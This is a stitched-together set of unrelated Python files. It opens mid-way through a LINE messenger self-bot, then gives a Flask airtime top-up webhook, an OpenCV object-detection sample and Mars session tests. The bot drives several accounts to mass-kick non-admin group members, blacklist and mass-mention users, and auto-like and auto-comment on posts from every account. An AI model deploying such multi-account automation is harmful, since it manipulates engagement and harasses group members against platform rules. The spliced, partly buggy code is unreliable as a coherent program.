for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- BAN MEMBERS BY TAG (2 TAGS OR EVEN 10 TAGGED MEMBERS)
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif msg.text.lower() in ["mention all","Tag"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
if jml > 500:
cl.sendText(msg.to,'Member count exceeds the limit.')
else:
# Mention members in batches of 100 so each summon call stays within the mention limit.
for i in range(0, jml, 100):
summon(msg.to, nama[i:i+100])
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#===========================================
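# Group name protection: when the group name changes in a protected group, restore the
# saved name and blacklist whoever changed it.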
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 25:
msg=op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
if op.type == 25:
msg=op.message
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = (cl.getProfile().displayName+" sedang sibuk/Off \nPenting Chat aja 👇👇👇")
jawaban = (jawab)
cl.sendText(msg.to,jawaban)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
if op.type == 32:
OWN = "u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots or op.param2 in admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
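# op.type == 55: read-receipt notification; record the reader's name against the
# lurking read point set for this chat.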
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
pass
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
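# Background worker: auto-like and auto-comment on new timeline posts with every bot
# account, depending on the "likeOn" and "commentOn" switches.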
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
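# Background worker: when the clock feature is on, append the current time to the
# display name roughly every ten minutes.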
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil ['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.60)
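# Main polling loop: fetch new operations from the server and dispatch each one to bot().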
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main.py
|
from flask import Flask, abort, request, jsonify
import logging
import time  # used by process_wait below
import json
import requests
from urllib.parse import parse_qs
import urllib
from threading import Thread,active_count
import datetime
import math
import random
from queue import Queue
from azurewebhook_functions import *
# Define a function for the long running transferto thread
def process_wait(q):
print('starting process')
while True:
try:
json_data = q.get()
tf = Transferto()
tf.read_transferto_credentials_file('transfertocredentials.json')
tf.read_rapidpro_credentials_file('rapidprocredentials.json')
tf.initiate_rapidpro_json(json_data)
wait_time = math.floor(random.uniform(10,25))
print(tf.get_rapidpro_fields()['transferto_status'])
print(wait_time)
time.sleep(wait_time)
transferto_update = {'transferto_status' : "Success",
'transferto_timestamp' : datetime.datetime.now().strftime("%d-%m-%Y %H:%M")}
tf.write_rapidpro_fields(transferto_update)
print("%s %s %s" %(transferto_update,
json_data['phone'],
tf.get_rapidpro_fields()['transferto_status'])
)
except:
print('bad thread')
# Define a function for the long running transferto thread
def process_transferto(q):
while True:
try:
json_data = q.get()
tf = Transferto()
tf.read_transferto_credentials_file('transfertocredentials.json')
tf.read_rapidpro_credentials_file('rapidprocredentials.json')
tf.initiate_rapidpro_json(json_data)
fields = tf.get_rapidpro_fields()
tf.get_msisdn_products()
tf.get_product_id()
tf.payload_generation()
services = tf.post_transferto_goods('https://api.transferto.com/v1.1/transactions/fixed_value_recharges')
dict_vals = services.json()
print(dict_vals['status_message'])
transferto_update = {'transferto_status' : dict_vals['status_message'],
'transferto_timestamp' : datetime.datetime.now().strftime("%d-%m-%Y %H:%M")}
print(transferto_update)
tf.write_rapidpro_fields(transferto_update)
print("%s %s %s" %(transferto_update,
json_data['phone'],
tf.get_rapidpro_fields()['transferto_status']))
print(json.dumps(services.json()))
except:
print("bad thread didn't load %s" %(json_data['phone']))
app = Flask(__name__)
@app.route('/')
def home_screen():
return 'Hmmmm!'
@app.route('/getProducts', methods = ['POST'])
def get_product_object():
"""
End point to return the products associated with a phone number
"""
json_data = request.get_json()
tf = Transferto()
tf.read_transferto_credentials_file("transfertocredentials.json")
tf.initiate_rapidpro_json(json_data)
products = tf.get_msisdn_products()
return(json.dumps(products))
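# Hypothetical usage sketch (not part of the app): the handler above only reads the fields
# accessed through initiate_rapidpro_json, and "phone" is the only field this module itself
# references, so a minimal call might look like the following (URL and number are placeholders):
#
#   import requests
#   resp = requests.post('http://localhost:5000/getProducts', json={'phone': '+254700000000'})
#   print(resp.json())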
@app.route('/addData', methods = ['POST'])
def add_data_object():
"""
End point to actually load data onto a phone number
"""
json_data = request.get_json()
tf = Transferto()
tf.read_transferto_credentials_file("transfertocredentials.json")
tf.initiate_rapidpro_json(json_data)
tf.get_msisdn_products()
tf.get_product_id()
tf.payload_generation()
services = tf.post_transferto_goods('https://api.transferto.com/v1.1/transactions/fixed_value_recharges')
return(services.text)
@app.route('/rapidpro', methods = ['POST'])
def add_rapidpro_object():
"""
End point to actually load data onto a phone number
"""
json_data = request.form
print('here')
print(json_data['run'])
print(json_data['phone'])
tf = Transferto()
tf.read_transferto_credentials_file('transfertocredentials.json')
tf.read_rapidpro_credentials_file('rapidprocredentials.json')
tf.initiate_rapidpro_json(json_data)
fields = tf.get_rapidpro_fields()
tf.get_msisdn_products()
tf.get_product_id()
tf.payload_generation()
services = tf.post_transferto_goods('https://api.transferto.com/v1.1/transactions/fixed_value_recharges')
#return(services.text)
print(json.dumps(services.json()))
return(json.dumps(services.json()))
@app.route('/rapidprothreaded', methods = ['POST'])
def add_rapidpro_thread():
"""
End point to actually load data onto a phone number
"""
json_data = request.form
q.put(json_data)
return jsonify(
transferto_status='Starting',
transferto_timestamp=datetime.datetime.now().strftime("%d-%m-%Y %H:%M")
)
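# Note: this threaded endpoint replies immediately with a "Starting" status; the actual
# TransferTo call is performed later by the worker thread consuming the shared queue
# (see process_transferto and the __main__ block below).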
@app.route('/wait', methods = ['POST'])
def add_wait_thread():
"""
Testing end point
"""
json_data = request.form
q.put(json_data)
return jsonify(
transferto_status='Starting',
transferto_timestamp=datetime.datetime.now().strftime("%d-%m-%Y %H:%M")
)
if __name__ == '__main__':
q = Queue(maxsize=0)
num_threads = 1
for i in range(num_threads):
worker = Thread(target=process_transferto, args=(q,))
worker.daemon = True
worker.start()
print('active threads = ')
print(active_count())
app.run(host= '0.0.0.0')
|
yolo_opencv_sample.py
|
# This sample is a copy from OpenCV version 4.4 Samples folder
import cv2 as cv
import argparse
import numpy as np
import sys
import time
from threading import Thread
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
from common import *
from tf_text_graph_common import readTextMessage
from tf_text_graph_ssd import createSSDGraph
from tf_text_graph_faster_rcnn import createFasterRCNNGraph
backends = (cv.dnn.DNN_BACKEND_DEFAULT, cv.dnn.DNN_BACKEND_HALIDE, cv.dnn.DNN_BACKEND_INFERENCE_ENGINE, cv.dnn.DNN_BACKEND_OPENCV)
targets = (cv.dnn.DNN_TARGET_CPU, cv.dnn.DNN_TARGET_OPENCL, cv.dnn.DNN_TARGET_OPENCL_FP16, cv.dnn.DNN_TARGET_MYRIAD)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--zoo', default=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'models.yml'),
help='An optional path to file with preprocessing parameters.')
parser.add_argument('--input', help='Path to input image or video file. Skip this argument to capture frames from a camera.')
parser.add_argument('--out_tf_graph', default='graph.pbtxt',
help='For models from TensorFlow Object Detection API, you may '
'pass a .config file which was used for training through --config '
'argument. This way an additional .pbtxt file with TensorFlow graph will be created.')
parser.add_argument('--framework', choices=['caffe', 'tensorflow', 'torch', 'darknet', 'dldt'],
help='Optional name of an origin framework of the model. '
'Detect it automatically if it is not set.')
parser.add_argument('--thr', type=float, default=0.5, help='Confidence threshold')
parser.add_argument('--nms', type=float, default=0.4, help='Non-maximum suppression threshold')
parser.add_argument('--backend', choices=backends, default=cv.dnn.DNN_BACKEND_DEFAULT, type=int,
help="Choose one of computation backends: "
"%d: automatically (by default), "
"%d: Halide language (http://halide-lang.org/), "
"%d: Intel's Deep Learning Inference Engine (https://software.intel.com/openvino-toolkit), "
"%d: OpenCV implementation" % backends)
parser.add_argument('--target', choices=targets, default=cv.dnn.DNN_TARGET_CPU, type=int,
help='Choose one of target computation devices: '
'%d: CPU target (by default), '
'%d: OpenCL, '
'%d: OpenCL fp16 (half-float precision), '
'%d: VPU' % targets)
parser.add_argument('--async', type=int, default=0,
dest='asyncN',
help='Number of asynchronous forwards at the same time. '
'Choose 0 for synchronous mode')
args, _ = parser.parse_known_args()
add_preproc_args(args.zoo, parser, 'object_detection')
parser = argparse.ArgumentParser(parents=[parser],
description='Use this script to run object detection deep learning networks using OpenCV.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
args = parser.parse_args()
args.model = findFile(args.model)
args.config = findFile(args.config)
args.classes = findFile(args.classes)
# If config specified, try to load it as TensorFlow Object Detection API's pipeline.
config = readTextMessage(args.config)
if 'model' in config:
print('TensorFlow Object Detection API config detected')
if 'ssd' in config['model'][0]:
print('Preparing text graph representation for SSD model: ' + args.out_tf_graph)
createSSDGraph(args.model, args.config, args.out_tf_graph)
args.config = args.out_tf_graph
elif 'faster_rcnn' in config['model'][0]:
print('Preparing text graph representation for Faster-RCNN model: ' + args.out_tf_graph)
createFasterRCNNGraph(args.model, args.config, args.out_tf_graph)
args.config = args.out_tf_graph
# Load names of classes
classes = None
if args.classes:
with open(args.classes, 'rt') as f:
classes = f.read().rstrip('\n').split('\n')
# Load a network
net = cv.dnn.readNet(cv.samples.findFile(args.model), cv.samples.findFile(args.config), args.framework)
net.setPreferableBackend(args.backend)
net.setPreferableTarget(args.target)
outNames = net.getUnconnectedOutLayersNames()
confThreshold = args.thr
nmsThreshold = args.nms
def postprocess(frame, outs):
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
def drawPred(classId, conf, left, top, right, bottom):
# Draw a bounding box.
cv.rectangle(frame, (left, top), (right, bottom), (0, 255, 0))
label = '%.2f' % conf
# Print a label of class.
if classes:
assert(classId < len(classes))
label = '%s: %s' % (classes[classId], label)
labelSize, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)
top = max(top, labelSize[1])
cv.rectangle(frame, (left, top - labelSize[1]), (left + labelSize[0], top + baseLine), (255, 255, 255), cv.FILLED)
cv.putText(frame, label, (left, top), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0))
layerNames = net.getLayerNames()
lastLayerId = net.getLayerId(layerNames[-1])
lastLayer = net.getLayer(lastLayerId)
classIds = []
confidences = []
boxes = []
if lastLayer.type == 'DetectionOutput':
# Network produces output blob with a shape 1x1xNx7 where N is the number of
# detections and every detection is a vector of values
# [batchId, classId, confidence, left, top, right, bottom]
for out in outs:
for detection in out[0, 0]:
confidence = detection[2]
if confidence > confThreshold:
left = int(detection[3])
top = int(detection[4])
right = int(detection[5])
bottom = int(detection[6])
width = right - left + 1
height = bottom - top + 1
if width <= 2 or height <= 2:
left = int(detection[3] * frameWidth)
top = int(detection[4] * frameHeight)
right = int(detection[5] * frameWidth)
bottom = int(detection[6] * frameHeight)
width = right - left + 1
height = bottom - top + 1
classIds.append(int(detection[1]) - 1) # Skip background label
confidences.append(float(confidence))
boxes.append([left, top, width, height])
elif lastLayer.type == 'Region':
# Network produces output blob with a shape NxC where N is the number of
# detected objects and C is the number of classes + 4, where the first 4
# numbers are [center_x, center_y, width, height]
for out in outs:
for detection in out:
scores = detection[5:]
classId = np.argmax(scores)
confidence = scores[classId]
if confidence > confThreshold:
center_x = int(detection[0] * frameWidth)
center_y = int(detection[1] * frameHeight)
width = int(detection[2] * frameWidth)
height = int(detection[3] * frameHeight)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
classIds.append(classId)
confidences.append(float(confidence))
boxes.append([left, top, width, height])
else:
print('Unknown output layer type: ' + lastLayer.type)
exit()
# NMS is applied inside the Region layer only with DNN_BACKEND_OPENCV; for other backends we need to run NMS here in the sample.
# NMS is also required when the network has more than one output.
if len(outNames) > 1 or lastLayer.type == 'Region' and args.backend != cv.dnn.DNN_BACKEND_OPENCV:
indices = []
classIds = np.array(classIds)
boxes = np.array(boxes)
confidences = np.array(confidences)
unique_classes = set(classIds)
for cl in unique_classes:
class_indices = np.where(classIds == cl)[0]
conf = confidences[class_indices]
box = boxes[class_indices].tolist()
nms_indices = cv.dnn.NMSBoxes(box, conf, confThreshold, nmsThreshold)
nms_indices = nms_indices[:, 0] if len(nms_indices) else []
indices.extend(class_indices[nms_indices])
else:
indices = np.arange(0, len(classIds))
for i in indices:
box = boxes[i]
left = box[0]
top = box[1]
width = box[2]
height = box[3]
drawPred(classIds[i], confidences[i], left, top, left + width, top + height)
# Process inputs
winName = 'Deep learning object detection in OpenCV'
cv.namedWindow(winName, cv.WINDOW_NORMAL)
def callback(pos):
global confThreshold
confThreshold = pos / 100.0
cv.createTrackbar('Confidence threshold, %', winName, int(confThreshold * 100), 99, callback)
cap = cv.VideoCapture(cv.samples.findFileOrKeep(args.input) if args.input else 0)
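# QueueFPS: a Queue that remembers when the first item was put so it can report the
# average put-rate (frames or predictions per second).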
class QueueFPS(queue.Queue):
def __init__(self):
queue.Queue.__init__(self)
self.startTime = 0
self.counter = 0
def put(self, v):
queue.Queue.put(self, v)
self.counter += 1
if self.counter == 1:
self.startTime = time.time()
def getFPS(self):
return self.counter / (time.time() - self.startTime)
process = True
#
# Frames capturing thread
#
framesQueue = QueueFPS()
def framesThreadBody():
global framesQueue, process
while process:
hasFrame, frame = cap.read()
if not hasFrame:
break
framesQueue.put(frame)
#
# Frames processing thread
#
processedFramesQueue = queue.Queue()
predictionsQueue = QueueFPS()
def processingThreadBody():
global processedFramesQueue, predictionsQueue, args, process
futureOutputs = []
while process:
# Get a next frame
frame = None
try:
frame = framesQueue.get_nowait()
if args.asyncN:
if len(futureOutputs) == args.asyncN:
frame = None # Skip the frame
else:
framesQueue.queue.clear() # Skip the rest of frames
except queue.Empty:
pass
if not frame is None:
frameHeight = frame.shape[0]
frameWidth = frame.shape[1]
# Create a 4D blob from a frame.
inpWidth = args.width if args.width else frameWidth
inpHeight = args.height if args.height else frameHeight
blob = cv.dnn.blobFromImage(frame, size=(inpWidth, inpHeight), swapRB=args.rgb, ddepth=cv.CV_8U)
processedFramesQueue.put(frame)
# Run a model
net.setInput(blob, scalefactor=args.scale, mean=args.mean)
if net.getLayer(0).outputNameToIndex('im_info') != -1: # Faster-RCNN or R-FCN
frame = cv.resize(frame, (inpWidth, inpHeight))
net.setInput(np.array([[inpHeight, inpWidth, 1.6]], dtype=np.float32), 'im_info')
if args.asyncN:
futureOutputs.append(net.forwardAsync())
else:
outs = net.forward(outNames)
predictionsQueue.put(np.copy(outs))
while futureOutputs and futureOutputs[0].wait_for(0):
out = futureOutputs[0].get()
predictionsQueue.put(np.copy([out]))
del futureOutputs[0]
framesThread = Thread(target=framesThreadBody)
framesThread.start()
processingThread = Thread(target=processingThreadBody)
processingThread.start()
#
# Postprocessing and rendering loop
#
while cv.waitKey(1) < 0:
try:
# Request predictions first because they are put into the queue after frames
outs = predictionsQueue.get_nowait()
frame = processedFramesQueue.get_nowait()
postprocess(frame, outs)
# Put efficiency information.
if predictionsQueue.counter > 1:
label = 'Camera: %.2f FPS' % (framesQueue.getFPS())
cv.putText(frame, label, (0, 15), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
label = 'Network: %.2f FPS' % (predictionsQueue.getFPS())
cv.putText(frame, label, (0, 30), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
label = 'Skipped frames: %d' % (framesQueue.counter - predictionsQueue.counter)
cv.putText(frame, label, (0, 45), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
cv.imshow(winName, frame)
except queue.Empty:
pass
process = False
framesThread.join()
processingThread.join()
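# Example invocation (a sketch only; the model, config and class files are placeholders
# you must supply, and preprocessing flags such as --width/--height/--rgb come from the
# parameters registered via add_preproc_args / models.yml):
#
#   python yolo_opencv_sample.py --input video.mp4 --model yolov3.weights \
#       --config yolov3.cfg --classes classes.txt --width 416 --height 416 --rgb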
|
test_session.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import sys
import tempfile
from collections import namedtuple
import numpy as np
import pandas as pd
import pytest
try:
import pyarrow as pa
except ImportError: # pragma: no cover
pa = None
import mars.tensor as mt
import mars.dataframe as md
import mars.remote as mr
from mars._version import __version__ as mars_version
from mars.config import option_context
from mars.deploy.utils import load_service_config_file
from mars.session import execute, fetch, fetch_log
test_namedtuple_type = namedtuple('TestNamedTuple', 'a b')
@pytest.fixture
def setup():
from ..deploy.oscar.tests.session import new_test_session
sess = new_test_session(address='127.0.0.1',
init_local=True,
default=True)
assert sess.get_cluster_versions() == [mars_version]
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_session_async_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
expected = raw_a.sum()
res = a.sum().to_numpy(wait=False).result()
assert expected == res
res = a.sum().execute(wait=False)
res = res.result().fetch()
assert expected == res
raw_df = pd.DataFrame(raw_a)
expected = raw_df.sum()
df = md.DataFrame(a)
res = df.sum().to_pandas(wait=False).result()
pd.testing.assert_series_equal(expected, res)
res = df.sum().execute(wait=False)
res = res.result().fetch()
pd.testing.assert_series_equal(expected, res)
t = [df.sum(), a.sum()]
res = mt.ExecutableTuple(t).to_object(wait=False).result()
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
res = mt.ExecutableTuple(t).execute(wait=False)
res = fetch(*res.result())
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
def test_executable_tuple_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
raw_df = pd.DataFrame(raw_a)
df = md.DataFrame(raw_df)
tp = test_namedtuple_type(a, df)
executable_tp = mt.ExecutableTuple(tp)
assert 'a' in dir(executable_tp)
assert executable_tp.a is a
assert test_namedtuple_type.__name__ in repr(executable_tp)
with pytest.raises(AttributeError):
getattr(executable_tp, 'c')
res = mt.ExecutableTuple(tp).execute().fetch()
assert test_namedtuple_type is type(res)
np.testing.assert_array_equal(raw_a, res.a)
pd.testing.assert_frame_equal(raw_df, res.b)
def test_multiple_output_execute(setup):
data = np.random.random((5, 9))
# test multiple outputs
arr1 = mt.tensor(data.copy(), chunk_size=3)
result = mt.modf(arr1).execute().fetch()
expected = np.modf(data)
np.testing.assert_array_equal(result[0], expected[0])
np.testing.assert_array_equal(result[1], expected[1])
# test 1 output
arr2 = mt.tensor(data.copy(), chunk_size=3)
result = ((arr2 + 1) * 2).to_numpy()
expected = (data + 1) * 2
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
arr3 = mt.tensor(data.copy(), chunk_size=3)
arrs = mt.split(arr3, 3, axis=1)
result = arrs[0].to_numpy()
expected = np.split(data, 3, axis=1)[0]
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
data = np.random.randint(0, 10, (5, 5))
arr3 = (mt.tensor(data) + 1) * 2
arrs = mt.linalg.qr(arr3)
result = (arrs[0] + 1).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 1
np.testing.assert_array_almost_equal(result, expected)
result = (arrs[0] + 2).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 2
np.testing.assert_array_almost_equal(result, expected)
s = mt.shape(0)
result = s.execute().fetch()
expected = np.shape(0)
assert result == expected
def test_closed_session():
from ..deploy.oscar.tests.session import new_test_session
session = new_test_session(default=True)
with option_context({'show_progress': False}):
arr = mt.ones((10, 10))
result = session.execute(arr)
np.testing.assert_array_equal(result, np.ones((10, 10)))
# close session
session.close()
with pytest.raises(RuntimeError):
session.execute(arr)
with pytest.raises(RuntimeError):
session.execute(arr + 1)
def test_array_protocol(setup):
arr = mt.ones((10, 20))
result = np.asarray(arr)
np.testing.assert_array_equal(result, np.ones((10, 20)))
arr2 = mt.ones((10, 20))
result = np.asarray(arr2, mt.bool_)
np.testing.assert_array_equal(result, np.ones((10, 20), dtype=np.bool_))
arr3 = mt.ones((10, 20)).sum()
result = np.asarray(arr3)
np.testing.assert_array_equal(result, np.asarray(200))
arr4 = mt.ones((10, 20)).sum()
result = np.asarray(arr4, dtype=np.float_)
np.testing.assert_array_equal(result, np.asarray(200, dtype=np.float_))
def test_without_fuse(setup):
arr1 = (mt.ones((10, 10), chunk_size=6) + 1) * 2
r1 = arr1.execute(fuse_enabled=False).fetch()
arr2 = (mt.ones((10, 10), chunk_size=5) + 1) * 2
r2 = arr2.execute(fuse_enabled=False).fetch()
np.testing.assert_array_equal(r1, r2)
def test_fetch_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
r1 = arr1.execute().fetch()
r2 = arr1[:2, 3:9].fetch()
np.testing.assert_array_equal(r2, r1[:2, 3:9])
r3 = arr1[0].fetch()
np.testing.assert_array_equal(r3, r1[0])
def test_fetch_dataframe_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
df1 = md.DataFrame(arr1)
r1 = df1.execute().fetch()
r2 = df1.iloc[:, :].fetch()
pd.testing.assert_frame_equal(r2, r1.iloc[:, :])
r3 = df1.iloc[1].fetch(extra_config={'check_series_name': False})
pd.testing.assert_series_equal(r3, r1.iloc[1])
r4 = df1.iloc[0, 2].fetch()
assert r4 == r1.iloc[0, 2]
arr2 = mt.random.rand(10, 3, chunk_size=3)
df2 = md.DataFrame(arr2)
r5 = df2.execute().fetch()
r6 = df2.iloc[:4].fetch(batch_size=3)
pd.testing.assert_frame_equal(r5.iloc[:4], r6)
def test_repr(setup):
# test tensor repr
with np.printoptions(threshold=100):
arr = np.random.randint(1000, size=(11, 4, 13))
t = mt.tensor(arr, chunk_size=3)
result = repr(t.execute())
expected = repr(arr)
assert result == expected
for size in (5, 58, 60, 62, 64):
pdf = pd.DataFrame(np.random.randint(1000, size=(size, 10)))
# test DataFrame repr
df = md.DataFrame(pdf, chunk_size=size//2)
result = repr(df.execute())
expected = repr(pdf)
assert result == expected
# test DataFrame _repr_html_
result = df.execute()._repr_html_()
expected = pdf._repr_html_()
assert result == expected
# test Series repr
ps = pdf[0]
s = md.Series(ps, chunk_size=size//2)
result = repr(s.execute())
expected = repr(ps)
assert result == expected
# test Index repr
pind = pd.date_range('2020-1-1', periods=10)
ind = md.Index(pind, chunk_size=5)
assert 'DatetimeIndex' in repr(ind.execute())
# test groupby repr
df = md.DataFrame(pd.DataFrame(np.random.rand(100, 3), columns=list('abc')))
grouped = df.groupby(['a', 'b']).execute()
assert 'DataFrameGroupBy' in repr(grouped)
# test Categorical repr
c = md.qcut(range(5), 3)
assert 'Categorical' in repr(c)
assert 'Categorical' in str(c)
assert repr(c.execute()) == repr(pd.qcut(range(5), 3))
def test_iter(setup):
raw_data = pd.DataFrame(np.random.randint(1000, size=(20, 10)))
df = md.DataFrame(raw_data, chunk_size=5)
for col, series in df.iteritems():
pd.testing.assert_series_equal(series.execute().fetch(), raw_data[col])
for i, batch in enumerate(df.iterbatch(batch_size=15)):
pd.testing.assert_frame_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_row, expect_row in zip(df.iterrows(batch_size=15),
raw_data.iterrows()):
assert result_row[0] == expect_row[0]
pd.testing.assert_series_equal(result_row[1], expect_row[1])
i += 1
assert i == len(raw_data)
i = 0
for result_tup, expect_tup in zip(df.itertuples(batch_size=10),
raw_data.itertuples()):
assert result_tup == expect_tup
i += 1
assert i == len(raw_data)
raw_data = pd.Series(np.random.randint(1000, size=(20,)))
s = md.Series(raw_data, chunk_size=5)
for i, batch in enumerate(s.iterbatch(batch_size=15)):
